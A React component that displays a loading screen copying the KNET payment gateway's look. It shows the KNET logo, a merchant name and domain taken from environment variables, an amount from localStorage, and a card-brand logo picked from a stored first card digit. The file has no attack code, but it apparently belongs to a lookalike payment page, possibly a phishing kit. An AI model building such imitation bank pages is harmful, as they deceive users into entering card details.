import React from 'react';
import HelpImage from './assets/help.gif';
import './Loader.css'
import { RotatingLines } from "react-loader-spinner";

import PciImage from './assets/pci.jpg'
import VisaImage from './assets/visa.jpg'
import MasterImage from './assets/master.jpg'
import { useTranslation } from 'react-i18next';

const KnetLoading = () => {
const { t } = useTranslation();


    const firstDigit = localStorage.getItem('first-digit');

    // Determine the image source and alt text
    let imageSrc, altText;
    if (firstDigit === '4') {
      imageSrc = VisaImage;
      altText = 'Visa';
    } else if (firstDigit === '5') {
      imageSrc = MasterImage;
      altText = 'Mastercard';
    } else {
      imageSrc = null; // No image if not 4 or 5
      altText = 'No card';
    }
  return (
    <>


        <div className="flex flex-col items-center w-full">
      <div className="flex flex-col w-full max-w-md p-3 min-h-lvh">
        <div className="w-full">
          <img className="w-full rounded-xl" src="/assets/img/mob.jpg" alt="" />
        </div>

        <div className="flex flex-col items-center w-full p-4 mt-4 border-2 border-blue-500 shadow-lg rounded-xl">
          <img src="/assets/img/New_knet_logo.jpg" alt="KNET Logo" />
          <img src="/assets/img/separator.jpg" className="mt-4" alt="" />

          <div className="flex flex-col w-full">
            <span className="text-lg font-bold text-blue-500">
              {t("billing_information")}
            </span>
            <div className="grid w-full grid-cols-3 gap-2 ml-1 text-sm">
              <span className="font-bold text-blue-500">{t("merchant")}</span>
              <span className="col-span-2">{process.env.REACT_APP_MERCHANT_NAME}</span>
              <span className="font-bold text-blue-500">{t("website")}</span>
              <span className="col-span-2">https://{process.env.REACT_APP_DOMAIN_NAME}</span>
              <span className="font-bold text-blue-500">{t("amount")}</span>
              <span>KD {localStorage.getItem("ksumm")}</span>
            </div>

            <div className="w-full my-16 flex justify-center">
                      <RotatingLines
                visible={true}
                height="64"
                width="64"
                color="#eeeeee"
                strokeColor='#868686'
                strokeWidth="5"
                animationDuration="0.75"
                ariaLabel="rotating-lines-loading"
                wrapperStyle={{}}
                wrapperClass=""
                />
            </div>

 
          </div>
        </div>

        <div className="flex flex-col items-center w-full text-xs text-center">
          <span className="mt-4">{t("copyright")}</span>
          <span className="font-semibold text-blue-500">
            {t("knet_footer")}
          </span>
        </div>
      </div>
    </div>

          </>
  );
};

export default KnetLoading;
